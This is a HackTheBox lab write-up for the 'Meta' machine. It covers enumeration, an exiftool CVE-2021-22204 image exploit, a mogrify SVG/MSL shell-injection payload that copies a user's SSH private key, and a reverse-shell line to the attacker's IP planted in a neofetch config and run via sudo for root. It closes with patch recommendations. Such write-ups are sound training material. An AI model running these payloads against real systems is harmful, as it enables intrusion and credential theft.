This is a writeup for the Meta machine from the HackTheBox site.
Enumeration #
First, let’s start with a scan of our target with the following command:
nmap -sV -T4 -Pn 10.129.119.94
Two TCP ports are discovered:
- 22/tcp : SSH port (OpenSSH 7.9p1)
- 80/tcp : HTTP web server (Apache httpd)
Exploit #
At first I order by listing the different pages of the site.
Nothing in particular, I continue by making an enumeration of the subdomains.
Ok, there is a subdomain, I add it to the /etc/hosts file, then I access it via a browser.
It is a page that redirects us to another page that contains a form to upload a file.
So I try to upload an image to see what the page tells me:
The result reminds me strongly of a crypto tool I already used: exiftool.
So I know that on the server side, this tool is used, it’s a good information ! So I look if there are exploits with this service. Quickly I find this flaw : CVE-2021-22204. It is an exploit that allows via meta data in an image the execution of instructions. So we can create a reverse shell ! With a little more research I find this github.
It is a tool for image modification and reverse shell insertion.
┌──(d3vyce㉿kali)-[~]
└─$ python3 exploit.py
1 image files updated
Once the image is modified, I upload it and it creates the reverse shell:
I look for the location of the flag with the following command:
find / -name user.txt 2>/dev/null
I find that the flag is in thomas personal file, but I don’t have the rights to read it…
So I am looking for a way to change the user. In the site folder, I find a folder convert_image… It is said to be an input folder for a script or a service that would convert images. I am looking for other elements with the same name on the system:
www-data@meta:/var/www/dev01.artcorp.htb/convert_images$ find / -name convert_image* 2>/dev/null
<ert_images$ find / -name convert_image* 2>/dev/null
/usr/local/bin/convert_images.sh
/var/www/dev01.artcorp.htb/convert_images
There is a script with the same name! Looking at the content, I can see that it uses the [mogrify](https://linux.die.net/man/1/mogrify) service to perform the conversion of the images in the folder.
#!/bin/bash
cd /var/www/dev01.artcorp.htb/convert_images/ && /usr/local/bin/mogrify -format png *.* 2>/dev/null
pkill mogrify
I look for the version of the service with the following command:
Then I look if there are some feats. After some research I find this exploit. It allows to do a shell injection in an SVG image.
So I use the template provided in the article, then I modify it to get the content of the id_rsa file of the user thomas.
<image authenticate='ff" `echo $(cat /home/thomas/.ssh/id_rsa)> /dev/shm/id`;"'>
<read filename="pdf:/etc/passwd"/>
<get width="base-width" height="base-height" />
<resize geometry="400x400" />
<write filename="test.png" />
<svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="msl:poc.svg" height="100" width="100"/>
</svg>
</image>
Then I copy the file to the convert_images folder. After a few seconds I find the newly created file in the /dev/shm.
Now that I have this file, I add the privileges and create an SSH session:
I now have a shell as thomas and I get the first flag.
Privilege escalation #
I start by checking the sudo permissions of my user. I notice 2 things:
- I have the right to use the command
/usr/bin/neofetch \"\"as root - The environment variable
XDG_CONFIG_HOMEis kept when running sudo
After some research, I find that neofetch has a file in configuration in the folder ~/.config/neofetch/. So I start by putting a reverse shell in this config file.
thomas@meta:~/.config/neofetch$ cd .config/neofetch/
thomas@meta:~/.config/neofetch$ echo "/bin/sh -i >& /dev/tcp/10.10.14.40/2345 0>&1" > config.conf
Then I set the variable XDG_CONFIG_HOME with the .local of my user. Then I run neofetch as sudo.
thomas@meta:~/.config/neofetch$ export XDG_CONFIG_HOME="$HOME/.config"
thomas@meta:~/.config/neofetch$ sudo -u root /usr/bin/neofetch \"\"
I now have a reverse shell root and I can get the last flag.
Recommendations #
To patch this host I think it would be necessary to perform a number of actions:
- Update
exiftoolto avoid CVE-2021-22204 - Update
mogrifyto avoid shell injection exploit - Disable the option to keep the
XDG_CONFIG_HOMEvariable at runtime with sudo